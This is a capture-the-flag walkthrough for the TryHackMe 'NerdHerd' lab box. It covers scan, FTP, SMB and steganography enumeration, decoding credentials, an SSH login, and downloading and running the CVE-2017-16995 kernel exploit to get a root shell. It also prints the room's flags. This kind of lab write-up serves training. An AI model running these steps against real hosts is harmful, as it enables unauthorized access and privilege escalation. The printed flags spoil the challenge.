Hack your way into this easy/medium level legendary TV series “Chuck” themed box!
NerdHerd
💢 We will cover the topics#
- Network Enumeration
- Linux Enumeration
- FTP Enumeration
- SMB Enumeration
- Steganography
- Cryptography
- CVE-2017-16995 - Linux Kernel < 4.13.9
Task 1 PWN#
This is the very first vulnerable machine that I’ve created. So, feel free to share your opinions/advices with me on my DC: 0xpr0N3rd (alright maybe for nudges too)
I’ve enjoyed developing this box and I hope you enjoy it while solving.
Hack this machine before nerd herd fellas arrive, happy hacking!!!
NOTE # Please do not stream or publish any write-ups for this room at least 1 week after the release.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
| kali@kali:~/CTFs/tryhackme/NerdHerd$ sudo nmap -A -sS -sC -sV -Pn -p- 10.10.48.80
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 22:59 CET
Nmap scan report for 10.10.48.80
Host is up (0.050s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.106.222
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0c:84:1b:36:b2:a2:e1:11:dd:6a:ef:42:7b:0d:bb:43 (RSA)
| 256 e2:5d:9e:e7:28:ea:d3:dd:d4:cc:20:86:a3:df:23:b8 (ECDSA)
|_ 256 ec:be:23:7b:a9:4c:21:85:bc:a8:db:0e:7c:39:de:49 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1337/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/31%OT=21%CT=1%CU=37433%PV=Y%DS=2%DC=T%G=Y%TM=5F9DDE
OS:A2%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)SE
OS:Q(SP=105%GCD=1%ISR=107%TI=Z%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%
OS:O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2
OS:=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNS
OS:NW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%
OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: NERDHERD; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: NERDHERD, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: nerdherd
| NetBIOS computer name: NERDHERD\x00
| Domain name: \x00
| FQDN: nerdherd
|_ System time: 2020-11-01T00:01:04+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-31T22:01:04
|_ start_date: N/A
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 32.15 ms 10.8.0.1
2 67.41 ms 10.10.48.80
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.41 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| kali@kali:~/CTFs/tryhackme/NerdHerd$ ftp 10.10.132.29
Connected to 10.10.132.29.
220 (vsFTPd 3.0.3)
Name (10.10.132.29:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:03 ..
drwxr-xr-x 2 ftp ftp 4096 Sep 14 18:35 .jokesonyou
-rw-rw-r-- 1 ftp ftp 89894 Sep 11 03:45 youfoundme.png
226 Directory send OK.
ftp> get .jokesonyou
local: .jokesonyou remote: .jokesonyou
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> cd .jokesonyou
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Sep 14 18:35 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 03:45 ..
-rw-r--r-- 1 ftp ftp 28 Sep 14 18:35 hellon3rd.txt
226 Directory send OK.
ftp> get hellon3rd.txt
local: hellon3rd.txt remote: hellon3rd.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hellon3rd.txt (28 bytes).
226 Transfer complete.
28 bytes received in 0.08 secs (0.3231 kB/s)
ftp>
|
1
2
| kali@kali:~/CTFs/tryhackme/NerdHerd$ cat hellon3rd.txt
all you need is in the leet
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| kali@kali:~/CTFs/tryhackme/NerdHerd$ exiftool youfoundme.png
ExifTool Version Number : 12.06
File Name : youfoundme.png
Directory : .
File Size : 88 kB
File Modification Date/Time : 2020:10:31 21:15:39+01:00
File Access Date/Time : 2020:10:31 21:15:49+01:00
File Inode Change Date/Time : 2020:10:31 21:15:39+01:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 894
Image Height : 894
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Background Color : 255 255 255
Pixels Per Unit X : 3543
Pixels Per Unit Y : 3543
Pixel Units : meters
Warning : [minor] Text chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate : 2010-10-26T08:00:31-07:00
Datemodify : 2010-10-26T08:00:31-07:00
Software : www.inkscape.org
EXIF Orientation : 1
Exif Byte Order : Big-endian (Motorola, MM)
Resolution Unit : inches
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
Flashpix Version : 0100
Owner Name : fijbxslz
Image Size : 894x894
Megapixels : 0.799
|
Owner Name : fijbxslz
https://www.boxentriq.com/code-breaking/cipher-identifier
1
2
3
4
5
6
7
8
9
| kali@kali:~/CTFs/tryhackme/NerdHerd$ smbclient -L \\10.10.48.80
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
nerdherd_classified Disk Samba on Ubuntu
IPC$ IPC IPC Service (nerdherd server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
|
1
2
3
| kali@kali:~/CTFs/tryhackme/NerdHerd$ smbclient \\\\10.10.48.80\\nerdherd_classified
Enter WORKGROUP\kali's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
|
1
2
| kali@kali:~/CTFs/tryhackme/NerdHerd$ echo 'Y2liYXJ0b3dza2k=' | base64 -d
cibartowski
|
1
2
| kali@kali:~/CTFs/tryhackme/NerdHerd$ echo 'aGVoZWdvdTwdasddHlvdQ==' | base64 -d
hehegou
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
| kali@kali:~/CTFs/tryhackme/NerdHerd$ enum4linux 10.10.132.29
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Nov 6 13:49:43 2020
==========================
| Target Information |
==========================
Target ........... 10.10.132.29
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.132.29 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 10.10.132.29 |
============================================
Looking up status of 10.10.132.29
NERDHERD <00> - B <ACTIVE> Workstation Service
NERDHERD <03> - B <ACTIVE> Messenger Service
NERDHERD <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 10.10.132.29 |
=====================================
[+] Server 10.10.132.29 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.132.29 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 10.10.132.29 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.132.29 from smbclient:
[+] Got OS info for 10.10.132.29 from srvinfo:
NERDHERD Wk Sv PrQ Unx NT SNT nerdherd server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 10.10.132.29 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: chuck Name: ChuckBartowski Desc:
user:[chuck] rid:[0x3e8]
=========================================
| Share Enumeration on 10.10.132.29 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
nerdherd_classified Disk Samba on Ubuntu
IPC$ IPC IPC Service (nerdherd server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.132.29
//10.10.132.29/print$ Mapping: DENIED, Listing: N/A
//10.10.132.29/nerdherd_classified Mapping: DENIED, Listing: N/A
//10.10.132.29/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 10.10.132.29 |
====================================================
[+] Attaching to 10.10.132.29 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] NERDHERD
[+] Builtin
[+] Password Info for Domain: NERDHERD
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
=======================================================================
| Users on 10.10.132.29 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2306820301-2176855359-2727674639
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\chuck (Local User)
S-1-22-1-1002 Unix User\ftpuser (Local User)
[+] Enumerating users using SID S-1-5-21-2306820301-2176855359-2727674639 and logon username '', password ''
S-1-5-21-2306820301-2176855359-2727674639-500 *unknown*\*unknown* (8)
S-1-5-21-2306820301-2176855359-2727674639-501 NERDHERD\nobody (Local User)
S-1-5-21-2306820301-2176855359-2727674639-513 NERDHERD\None (Domain Group)
S-1-5-21-2306820301-2176855359-2727674639-1000 NERDHERD\chuck (Local User)
=============================================
| Getting printer info for 10.10.132.29 |
=============================================
No printers returned.
enum4linux complete on Fri Nov 6 13:53:33 2020
|
https://www.youtube.com/watch?v=9Gc4QTqslN4
https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode(‘BirdistheWord’)&input=ZmlqYnhzbHo
easypass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| kali@kali:~/CTFs/tryhackme/NerdHerd$ smbclient -U chuck \\\\10.10.132.29\\nerdherd_classified
Enter WORKGROUP\chuck's password:
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> ls
. D 0 Fri Sep 11 03:29:53 2020
.. D 0 Thu Nov 5 21:44:40 2020
secr3t.txt N 125 Fri Sep 11 03:29:53 2020
8124856 blocks of size 1024. 3414104 blocks available
smb: \> get secr3t.txt
getting file \secr3t.txt of size 125 as secr3t.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \>
|
http://10.10.132.29:1337/this1sn0tadirect0ry/
http://10.10.132.29:1337/this1sn0tadirect0ry/creds.txt
1
2
3
4
5
| alright, enough with the games.
here, take my ssh creds:
chuck : th1s41ntmypa5s
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| kali@kali:~/CTFs/tryhackme/NerdHerd$ ssh chuck@10.10.132.29
The authenticity of host '10.10.132.29 (10.10.132.29)' can't be established.
ECDSA key fingerprint is SHA256:Zf9lZPGnZpw5EjeSwBXbXbeyTILyhw998cnd87rFDTU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.132.29' (ECDSA) to the list of known hosts.
chuck@10.10.132.29's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-31-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
747 packages can be updated.
522 updates are security updates.
Last login: Wed Oct 14 17:03:42 2020 from 22.0.97.11
chuck@nerdherd:~$ ls -la
total 136
drwxr-xr-x 19 chuck chuck 4096 Kas 5 22:44 .
drwxr-xr-x 4 root root 4096 Eyl 11 03:43 ..
-rw------- 1 chuck chuck 742 Kas 5 22:44 .bash_history
-rw-r--r-- 1 chuck chuck 220 Eyl 11 01:17 .bash_logout
-rw-r--r-- 1 chuck chuck 3771 Eyl 11 01:17 .bashrc
drwx------ 14 chuck chuck 4096 Eyl 14 19:20 .cache
drwx------ 3 chuck chuck 4096 Eyl 11 03:31 .compiz
drwx------ 15 chuck chuck 4096 Kas 5 22:42 .config
drwxr-xr-x 2 chuck chuck 4096 Kas 5 22:43 Desktop
-rw-r--r-- 1 chuck chuck 25 Eyl 11 01:32 .dmrc
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Documents
drwxr-xr-x 3 chuck chuck 4096 Eyl 11 04:45 Downloads
-rw-r--r-- 1 chuck chuck 8980 Eyl 11 01:17 examples.desktop
drwx------ 2 chuck chuck 4096 Eki 19 11:38 .gconf
drwx------ 3 chuck chuck 4096 Kas 5 22:40 .gnupg
-rw------- 1 chuck chuck 4564 Kas 5 22:40 .ICEauthority
drwx------ 3 chuck chuck 4096 Eyl 11 01:32 .local
drwx------ 4 chuck chuck 4096 Eyl 11 02:03 .mozilla
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Music
drwxrwxr-x 2 chuck chuck 4096 Eyl 11 03:29 .nano
drwxr-xr-x 2 root root 4096 Eyl 11 04:29 nerdherd_classified
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Pictures
-rw-r--r-- 1 chuck chuck 655 Eyl 11 01:17 .profile
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Public
-rw-r--r-- 1 chuck chuck 0 Eyl 11 01:38 .sudo_as_admin_successful
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Templates
-rw-rw-r-- 1 chuck chuck 46 Eyl 14 19:26 user.txt
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 01:32 Videos
-rw------- 1 root root 511 Eyl 11 02:58 .viminfo
-rw------- 1 chuck chuck 53 Kas 5 22:40 .Xauthority
-rw------- 1 chuck chuck 82 Kas 5 22:40 .xsession-errors
-rw------- 1 chuck chuck 82 Kas 5 20:26 .xsession-errors.old
chuck@nerdherd:~$ cat user.txt
THM{7fc91d70e22e9b70f98aaf19f9a1c3ca710661be}
|
Linux Kernel < 4.13.9
CVE-2017-16995 - Linux Kernel < 4.13.9
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| chuck@nerdherd:~$ which gcc
/usr/bin/gcc
chuck@nerdherd:~$ wget 10.8.106.222/45010.c
--2020-11-06 15:18:07-- http://10.8.106.222/45010.c
Connecting to 10.8.106.222:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: ‘45010.c’
45010.c 100%[==========================>] 13,41K --.-KB/s in 0,03s
2020-11-06 15:18:07 (408 KB/s) - ‘45010.c’ saved [13728/13728]
chuck@nerdherd:~$ gcc 45010.c -o exploit
chuck@nerdherd:~$ ./exploit
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003b52f200
[*] Leaking sock struct from ffff88003c882d00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003afbc780
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003afbc780
[*] credentials patched, launching shell...
# whoami
root
# cat /root/root.txt
cmon, wouldnt it be too easy if i place the root flag here?
# locate root.txt
/opt/.root.txt
/root/root.txt
# cat /opt/.root.txt
nOOt nOOt! you've found the real flag, congratz!
THM{5c5b7f0a81ac1c00732803adcee4a473cf1be693}
# cd /root
# cat .bash_history | grep -i -a thm
THM{a975c295ddeab5b1a5323df92f61c4cc9fc88207}
|
- User Flag
THM{7fc91d70e22e9b70f98aaf19f9a1c3ca710661be}
- Root Flag
THM{5c5b7f0a81ac1c00732803adcee4a473cf1be693}
- Bonus Flag
THM{a975c295ddeab5b1a5323df92f61c4cc9fc88207}